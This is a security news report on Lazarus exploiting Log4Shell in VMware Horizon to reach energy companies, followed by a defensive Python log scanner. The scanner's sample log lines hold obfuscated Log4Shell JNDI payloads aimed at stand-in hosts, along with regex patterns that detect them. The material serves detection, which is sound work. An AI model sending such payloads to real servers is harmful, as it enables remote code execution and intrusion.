The North Korean APT group ‘Lazarus’ (APT38) is exploiting VMware Horizon servers to access the corporate networks of energy providers in the United States, Canada, and Japan.

Lazarus is a state-backed threat actor known for conducting espionage, data theft, and cryptocurrency-stealing campaigns over the past decade. The threat actors are responsible for hundreds of sophisticated attacks internationally.

According to researchers at Cisco Talos who uncovered the latest operation, Lazarus targeted energy organizations between February and July 2022, leveraging public VMware Horizon exploits for initial access. From there, they used custom malware families like ‘VSingle’ and ‘YamaBot’ and a previously unknown Remote Access Trojan (RAT) named ‘MagicRAT’ to search for and steal data from infected devices.

Cisco Talos presents several attack strategies that illustrate Lazarus’ latest tactics, techniques, and procedures (TTPs) and highlight the versatility of the sophisticated hacking group.

In the first case, the threat actors exploit VMware servers vulnerable to Log4Shell flaws to run shellcode that establishes a reverse shell for running arbitrary commands on the compromised endpoint.

In the second case presented in the report, which concerns a different victim, the initial access and reconnaissance follow similar patterns, but this time the hackers dropped MagicRAT along with VSingle.

In the third intrusion case, Lazarus deployed YamaBot, a custom malware written in Go, featuring standard RAT capabilities.

The idea behind these variations is to mix up TTPs and make attribution, detection, and defense more challenging for incident responders. As highlighted in this report, Lazarus is closely monitored by cybersecurity firms, so they can’t afford to become lazy in diversifying their attack chains.
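Because the initial access in the first case is Log4Shell against an internet-facing VMware Horizon server, the most useful thing a defender can do with this report is check their own Horizon access logs for JNDI lookup strings. The script below is an added example written for this article, not code from Cisco Talos or from the report; it normalizes the common nested-lookup obfuscations (`${lower:x}`, `${upper:x}`, `${::-x}`) before matching, and runs over a handful of constructed Apache-style access-log lines (the IP addresses, paths and `example.invalid` hosts are made up for the example).

```python
import re
from typing import Dict, List

# Constructed sample access-log lines for the example (not real traffic):
# a benign request, three requests carrying JNDI lookups in different places
# and with different obfuscations, and another benign request.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2022:10:01:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [12/Mar/2022:10:01:04 +0000] "GET /portal/?x=${${lower:j}ndi:rmi://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.12 - - [12/Mar/2022:10:01:05 +0000] "GET /portal/?q=${${::-j}${::-n}${::-d}${::-i}:dns://example.invalid/c} HTTP/1.1" 200 10 "-" "x"',
    '10.0.0.3 - - [12/Mar/2022:10:01:06 +0000] "POST /api/login HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
]

# ${lower:X} / ${upper:X} lookups that only exist to hide the literal "jndi".
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-X} evaluates to its default value X (e.g. ${::-j} -> j).
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# After normalization, a JNDI lookup looks like ${jndi:<scheme>:...}.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse nested Log4j lookups until the string stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(r"\1", text)
    return text


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per line that carries a JNDI lookup anywhere in it.

    Each hit records the 1-based line number, the client IP (assumed to be the
    first whitespace-separated field, as in Apache/nginx combined format),
    the JNDI scheme seen after normalization, and the normalized line."""
    hits: List[Dict[str, object]] = []
    for number, raw in enumerate(lines, start=1):
        normalized = normalize(raw)
        match = _JNDI.search(normalized)
        if not match:
            continue
        hits.append(
            {
                "line": number,
                "source_ip": raw.split(" ", 1)[0],
                "scheme": match.group(1).lower(),
                "normalized": normalized,
            }
        )
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['source_ip']} jndi scheme={hit['scheme']}")
```

The normalization loop matters more than the final regex: a rule that only matches the literal `${jndi:` misses the second and third hits above. In practice you would feed the scanner every request field Log4j may have logged (URI, User-Agent, Referer, X-Forwarded-For and any custom headers), and treat a hit on a Horizon server as a trigger to look for the follow-on activity the report describes (reverse shells, VSingle, MagicRAT or YamaBot) rather than as a standalone event.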